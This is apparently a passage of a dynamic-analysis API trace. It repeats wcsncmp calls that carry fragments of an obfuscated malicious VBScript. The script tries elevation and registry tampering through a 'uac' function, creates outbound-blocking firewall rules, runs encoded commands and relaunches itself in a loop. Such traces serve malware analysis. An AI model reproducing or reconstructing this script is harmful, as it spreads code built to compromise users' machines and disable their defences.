1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0223.009] wcsncmp (_String1="name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.009] wcsncmp (_String1="ame\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0223.009] wcsncmp (_String1="me\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0223.009] wcsncmp (_String1="e\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.009] wcsncmp (_String1="\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 